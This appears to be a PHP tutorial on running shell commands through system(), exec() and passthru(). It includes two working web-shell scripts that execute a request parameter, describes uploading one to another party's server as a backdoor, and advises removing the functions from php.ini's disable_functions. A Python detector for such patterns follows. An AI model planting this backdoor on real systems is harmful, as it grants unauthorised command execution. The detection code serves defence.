To execute shell commands from PHP, you can use the following functions:
string system ( string $command [, int &$return_var ] )
string exec ( string $command [, array &$output [, int &$return_var ]] )
void passthru ( string $command [, int &$return_var ] )
These three functions are all disabled by default.
To use them, first modify the PHP configuration file php.ini:
find the keyword disable_functions and delete these function names from that entry.
Then remember to restart Apache.
First look at system() and passthru(), which are similar and can be used interchangeably:
<?php
# Get the parameter passed to the web page
$shell = $_REQUEST['shell'];
echo "<pre>";
system($shell, $status);
echo "</pre>";
// Pay attention to the correspondence between the execution result of the shell command and the status value returned by the execution
$shell = "<font color='red'>$shell</font>";
if( $status ){
    echo "The execution of the shell command {$shell} failed";
} else {
    echo "The shell command {$shell} was successfully executed";
}
?>
Access the address and pass the shell parameter:
http://localhost:81/shell.php?shell=ipconfig
Note that system() displays the result immediately after the shell command is executed. This is inconvenient, because sometimes we do not need to output the result immediately, or at all, so we can use exec() instead.
Example of using exec():
<?php
$shell = $_REQUEST['shell'];
exec($shell, $result, $status);
$shell = "<font color='red'>$shell</font>";
echo "<pre>";
if( $status ){
    echo "The execution of the shell command {$shell} failed";
} else {
    echo "The shell command {$shell} was successfully executed, and the result is as follows<hr>";
    print_r( $result );
}
echo "</pre>";
?>
exec() executes the shell command but does not print the result itself; you need an output statement to print the contents of $result.
Used as a small backdoor, it is uploaded to the website directory on the other party's server; visiting its address then lets you execute the command you want on the target machine and get the echoed result.
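From the defending side, the two scripts above share one recognizable shape: a request parameter reaching system(), exec() or passthru(), possibly through a variable. The following is an added example, not code from the original page: a heuristic Python check that reports which of the three functions a php.ini leaves enabled and flags such calls in PHP source. The function names and sample strings are assumptions constructed for illustration.

```python
import re

EXEC_FUNCS = ("system", "exec", "passthru")      # the three functions covered on this page
SUPERGLOBAL = r"\$_(?:REQUEST|GET|POST|COOKIE)\b"
# Lookbehind skips shell_exec(), $obj->exec(), Class::exec() and variables named $exec.
CALL = re.compile(r"(?<![\w>$:])(%s)\s*\(\s*([^,)]*)" % "|".join(EXEC_FUNCS), re.I)
ASSIGN = re.compile(r"(\$\w+)\s*=(?![=>])\s*(.*)", re.S)

def enabled_exec_funcs(php_ini_text):
    """Return which of the three functions are NOT listed in disable_functions."""
    disabled = set()
    for line in php_ini_text.splitlines():
        m = re.match(r"\s*disable_functions\s*=(.*)", line.split(";", 1)[0])
        if m:
            disabled = {f.strip(' "').lower() for f in m.group(1).split(",")}
    return [f for f in EXEC_FUNCS if f not in disabled]

def _tainted(expr, tainted_vars):
    """True if expr uses a request superglobal or a variable derived from one."""
    return bool(re.search(SUPERGLOBAL, expr)) or any(
        re.search(re.escape(v) + r"\b", expr) for v in tainted_vars)

def find_tainted_calls(php_source):
    """Return (line_no, function, argument) where request input reaches a shell call."""
    tainted_vars, findings = set(), []
    for no, line in enumerate(php_source.splitlines(), 1):
        if re.match(r"\s*(//|#)", line):          # skip full-line comments
            continue
        for stmt in line.split(";"):              # heuristic statement split
            for func, arg in CALL.findall(stmt):
                if _tainted(arg, tainted_vars):
                    findings.append((no, func.lower(), arg.strip()))
            m = ASSIGN.search(stmt)
            if m:                                 # propagate or clear taint
                var, rhs = m.groups()
                if _tainted(rhs, tainted_vars):
                    tainted_vars.add(var)
                else:
                    tainted_vars.discard(var)
    return findings

# Constructed sample: the page's first script, one statement per line.
SAMPLE = """<?php
#Get webpage passing parameters
$shell = $_REQUEST['shell'];
echo "<pre>";
system($shell, $status);
echo "</pre>";
?>"""

if __name__ == "__main__":
    print(enabled_exec_funcs("disable_functions = exec,passthru ; constructed"))
    print(find_tainted_calls(SAMPLE))
```

This is a line-based heuristic for triage, not a PHP parser: it does not follow includes, function parameters or obfuscated calls, so a clean result does not prove a file is safe.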